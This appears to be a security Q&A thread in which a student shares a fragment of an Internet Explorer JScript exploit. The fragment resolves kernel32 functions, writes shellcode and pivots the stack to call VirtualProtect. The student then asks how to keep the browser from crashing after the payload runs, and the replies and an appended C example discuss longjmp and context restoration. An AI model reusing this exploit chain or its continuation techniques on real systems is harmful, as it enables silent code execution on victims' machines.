2

I am a student studying information security. Recently I read this article link and made full exploit code. calc.exe is executed as expected, but after running the shellcode, IE just crashed (because no more code is provided after the shellcode...). I tried to avoid the crash but could not find a proper solution. What I tried is as follows.

    ... var jscriptPointer = readDWORD(fakeRegExpAddr);
    var jscriptBase = resolveModuleBase(jscriptPointer);
    var kernel32Pointer = resolveModuleByIAT(jscriptBase, "KERNEL32.dll");
    var kernel32Base = resolveModuleBase(kernel32Pointer);
    var VirtualProtect = resolveKernel32Function(kernel32Base, "VirtualProtect");
    var GetModuleHandleA = resolveKernel32Function(kernel32Base, "GetModuleHandleA");
    var GetProcAddress = resolveKernel32Function(kernel32Base, "GetProcAddress");
    var stack = a(fakeRegExpAddr, readDWORD(fakeRegExpAddr));
    var regExpExecAddress = ((stack.charCodeAt(4)<<16)|stack.charCodeAt(3)) - 0x44;
    var oldEbp = ((stack.charCodeAt(7)&0xFF)<<24) | (stack.charCodeAt(6)<<8) | ((stack.charCodeAt(5)>>8)&0xFF);
    var newEbp = regExpExecAddress - 0x2000;
    var pLongjmpTarget = regExpExecAddress;
    var sc = fakeRegExpAddr + sizeof_RegExpObj;
    for(var f=0; f<shellcode.length; f++){
        a(sc + (f * sizeof_WORD), shellcode.charCodeAt(f));
    }
    var ctx = sc + 5;
    a(ctx + (2 * e), oldEbp);         // these two lines are for passing data
    a(ctx + (3 * e), pLongjmpTarget); // to shellcode.

    for(var f=newEbp-0x20; f<newEbp+0x40; f+=U)
    {
        a(f,0x7FFE0000);
    }

    a(newEbp + 4, VirtualProtect);
    a(newEbp + 4 + 4 + 0x18, sc);
    a(newEbp + 4 + 4 + 4 + 0x18, sc);
    a(newEbp + 4 + 4 + 4 + 4 + 0x18, (shellcode.length * sizeof_WCHAR));
    a(newEbp + 4 + 4 + 4 + 4 + 4 + 0x18, 0x40);
    a(newEbp + 4 + 4 + 4 + 4 + 4 + 4 + 0x18, newEbp);
    a(regExpExecAddress, newEbp);
}

This code is referenced from this link. Then I don't know what to do in the shellcode. How can I handle this problem? Any suggestions are welcome. Thanks in advance.

ruslan
  • It's not really a problem. You did your thing and executed your code. Even in a real-world scenario, who is surprised at IE crashing? –  Nov 11 '20 at 16:42
  • As I have mentioned, I am a student and I want to learn something. So could you provide some methods to avoid crash? – ruslan Nov 11 '20 at 16:45
  • Depending on the exploit, it may be unavoidable. –  Nov 11 '20 at 16:50
  • 1
    I first get the context of the IE process using the RtlCaptureContext Windows API, then after running calc.exe, I just restored the context using the NtContinue function. EIP moved as expected. But after running a few instructions, it just crashed again. What else can I do? – ruslan Nov 11 '20 at 16:54
  • After running the shellcode, no more JavaScript code needs to be executed. So I want to exit the JavaScript code. Is it possible? – ruslan Nov 12 '20 at 01:04
  • 1
    Just give it time, binary exploitation isn't the most popular topic here. If you haven't gotten an answer by tomorrow, I'll add a bounty –  Nov 12 '20 at 10:10
  • @MechMK: Thank you. I am waiting for your answer. Any suggestions are welcomed. – ruslan Nov 12 '20 at 15:56
  • Unfortunately, I don't have one. I'm not an expert in binary exploitation, but after I think 48 hours passed, I'll add a bounty, which encourages others to answer. –  Nov 12 '20 at 16:02
  • Thank you for your attention – ruslan Nov 12 '20 at 16:06
  • Here is your bounty. Hope you get a nice answer now –  Nov 14 '20 at 14:17
  • Thank you so much. – ruslan Nov 14 '20 at 14:19
  • 2
    See longjmp usage here: https://stackoverflow.com/questions/14685406/practical-usage-of-setjmp-and-longjmp-in-c – Overmind Nov 16 '20 at 13:40
  • Chances are you are not correctly restoring the execution of the program to the expected execution. Process continuation itself is an art in exploitation. – J-- Jun 06 '22 at 10:59

1 Answer

-1

This can be solved by longjmp. longjmp is similar to goto, so this can roll back to the original state of your code.

bypasser
  • 4
    Thank you for your reply. But could you specify more details? – ruslan Nov 14 '20 at 09:33
  • This doesn't really answer the question at all. Could you perhaps give a clearer explanation or add some code? –  Nov 14 '20 at 14:18
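The answer names longjmp but does not show the mechanism it relies on. The following is an added example (not code from the question, the answer, or the linked article) showing, in plain C, how setjmp saves an execution context and how longjmp returns control to that saved point without unwinding the intermediate frames one by one. The function names `run_with_recovery`, `nested` and `frames_unwound_normally` are illustrative and exist only in this example.

```c
#include <setjmp.h>
#include <stdio.h>

/* Execution context (registers, stack pointer, return address) captured by setjmp. */
static jmp_buf saved_ctx;

/* Counts frames of nested() that finished normally. It stays 0 when longjmp
 * fires, because the code after the recursive call is never reached. */
static int unwound_frames;

/* Recurses `depth` levels and then jumps straight back to the setjmp site,
 * delivering 42 as the second return value of setjmp. */
static void nested(int depth) {
    if (depth == 0)
        longjmp(saved_ctx, 42);   /* non-local transfer; never returns */
    nested(depth - 1);
    unwound_frames++;             /* skipped: longjmp bypasses these frames */
}

/* Saves a context, runs nested(), and reports how control came back.
 * Returns the value delivered by longjmp (42), or -1 if nested() had
 * returned normally, which it never does here. */
int run_with_recovery(int depth) {
    unwound_frames = 0;
    int rc = setjmp(saved_ctx);   /* 0 on the direct call, 42 after longjmp */
    if (rc == 0) {
        nested(depth);            /* the frame that called setjmp is still live */
        return -1;
    }
    return rc;
}

/* Accessor for the counter, so a caller can confirm no frame was unwound. */
int frames_unwound_normally(void) {
    return unwound_frames;
}

int main(void) {
    int rc = run_with_recovery(5);
    printf("longjmp delivered %d; frames that returned normally: %d\n",
           rc, frames_unwound_normally());
    return 0;
}
```

The behaviour is only defined while the function that called setjmp is still executing: the jmp_buf records a stack pointer and a return address, so if that frame has already returned, or the stack memory it lived in has been overwritten, the restored context points at stale data and the process typically faults. That is the constraint behind the comment that process continuation depends on restoring the expected execution state exactly, and it is why simply "jumping back" with a saved context is not a general fix.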